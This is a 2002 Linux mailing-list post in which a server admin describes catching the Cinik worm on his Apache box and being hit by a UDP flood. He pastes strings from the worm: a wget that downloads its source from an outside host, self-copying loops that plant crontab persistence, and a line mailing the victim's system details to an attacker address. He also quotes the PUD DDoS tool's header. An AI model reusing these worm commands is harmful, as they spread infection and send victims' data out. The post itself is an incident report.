[ale] Under attack! (html encoding alert)

James P. Kinney III jkinney at localnetsolutions.com
Tue Sep 24 01:26:27 EDT 2002




Sorry for the html, having a bit of a problem right now.



I stumbled across a cracker getting into my box.  May have come in through apache as the username on the installed app is apache.  (httpd error log looks like openssl attack. openssl was NOT upgraded <doh!>)

In ps, I saw :

21236 ?        S     96:33 /tmp/.cinik 63.238.109.140



Which is NOT something of mine. I was investigating a possible intrusion on another machine and did a ping on an IP address that someone had telneted in from on this clients machine. It was a live address with no DNS records and it suddenly went dark. A few minutes later, I noticed the connection lights on my DSL staying active for much longer than getting email. Saw the above process running on the webserver.



Ran "strings" on the found worm file. Some interesting stuff from that:



/usr/bin/wget http://zamfy.home.ro/0/cinik.c

mv /tmp/cinik.c /tmp/.cinik.c



echo -e 'chmod a+x $i

echo 1 `/bin/date +%H` \* \* \* $i %s \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go

echo '# ale altora'>> /tmp/.cinik.go

echo 'for i in `/usr/bin/find /usr /var /tmp /home /mnt -type f -perm 7 2>/dev/null`'>> /tmp/.cinik.go

echo 'do'>> /tmp/.cinik.go

echo ' cat /tmp/.cinik > $i'>> /tmp/.cinik.go

echo ' chmod a+x $i'>> /tmp/.cinik.go

echo ' echo 2 `/bin/date +%H` \* \* \* $i %1 \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go

echo 'done'>> /tmp/.cinik.go

echo ' '>> /tmp/.cinik.go

echo '# directoarele mele'>> /tmp/.cinik.go

echo 'for i in `/usr/bin/find /usr /var /tmp /home /mnt -type d -uid $myid`'>> /tmp/.cinik.go

echo ' cat /tmp/.cinik > $i/.cinik'>> /tmp/.cinik.go

echo ' chmod a+x $i/.cinik'>> /tmp/.cinik.go

echo ' echo 3 `/bin/date +%H` \* \* \* $i/.cinik %1 \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go

echo 'echo PROC > /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'cat /proc/cpuinfo >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'echo MEM >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'cat /usr/bin/free >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'echo HDD >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'cat /bin/df -h >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'echo IP >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'cat /sbin/ifconfig >> /tmp/.cinik.status'>> /tmp/.cinik.go

echo 'myip=`/sbin/ifconfig eth0 | head -2 | tail -1 | cut -d: -f2 | cut -d" " -f1`'>> /tmp/.cinik.go

echo 'mail cinik_worm at yahoo.com -s "$myip" < /tmp/cinik.status'>> /tmp/.cinik.go

echo 'rm -f /tmp/cinik.status'>> /tmp/.cinik.go

chmod a+x /tmp/.cinik.go;/tmp/.cinik.go;exit





This was from running strings on the lastlog in /var/log:

# strings lastlog 



171.118.33.65.cfl.rr.com



1-020.adsl.cyberlink.ch



But the real clincher is I caught the bastard in the act and got the source code intact!



>From the file /tmp/.cinic.c



/****************************************************************************

 *                                                                          *

 *           Peer-to-peer UDP Distributed Denial of Service (PUD)           *

 *                         by contem at efnet                                  *

 *                                                                          *

 *         Virtually connects computers via the udp protocol on the         *

 *  specified port.  Uses a newly created peer-to-peer protocol that        *

 *  incorperates uses on unstable or dead computers.  The program is        *

 *  ran with the parameters of another ip on the virtual network.  If       *

 *  running on the first computer, run with the ip 127.0.0.1 or some        *

 *  other type of local address.  Ex:                                       *

 *                                                                          *

 *           Computer A:   ./program 127.0.0.1                              *

 *           Computer B:   ./program Computer_A                             *

 *           Computer C:   ./program Computer_A                             *

 *           Computer D:   ./program Computer_C                             *

 *                                                                          *

 *         Any form of that will work.  The linking process works by        *

 *  giving each computer the list of avaliable computers, then              *

 *  using a technique called broadcast segmentation combined with TCP       *

 *  like functionality to insure that another computer on the network       *

 *  receives the broadcast packet, segments it again and recreates          *

 *  the packet to send to other hosts.  That technique can be used to       *

 *  support over 16 million simutaniously connected computers.              *

 *                                                                          *

 *         Thanks to ensane and st for donating shells and test beds        *

 *  for this program.  And for the admins who removed me because I          *

 *  was testing this program (you know who you are) need to watch           *

 *  their backs.                                                            *

 *                                                                          *

 *         I am not responsible for any harm caused by this program!        *

 *  I made this program to demonstrate peer-to-peer communication and       *

 *  should not be used in real life.  It is an education program that       *

 *  should never even be ran at all, nor used in any way, shape or          *

 *  form.  It is not the authors fault if it was used for any purposes      *

 *  other than educational.                                                 *

 *                                                                          *

 *                                                                          *

 *      A FEW MODIFICATIONS MADE BY CiNIK FOR BETTER HIDING ON THE VICTIM   *

 *                                                                          *

 *                                                                          *

 ****************************************************************************/



So now I'm getting pounded by udp packets in a DOS from at least 18 IP's.



This is going to the FBI.





-- 
James P. Kinney III   \Changing the mobile computing world/
President and CEO      \          one Linux user         /
Local Net Solutions,LLC \           at a time.          /
770-493-8244             \.___________________________./

GPG ID: 829C6CA7 James P. Kinney III (M.S. Physics) <jkinney at localnetsolutions.com>
Fingerprint = 3C9E 6366 54FC A3FE BA4D 0659 6190 ADC3 829C 6CA7 








 This is a digitally signed message part




More information about the Ale mailing list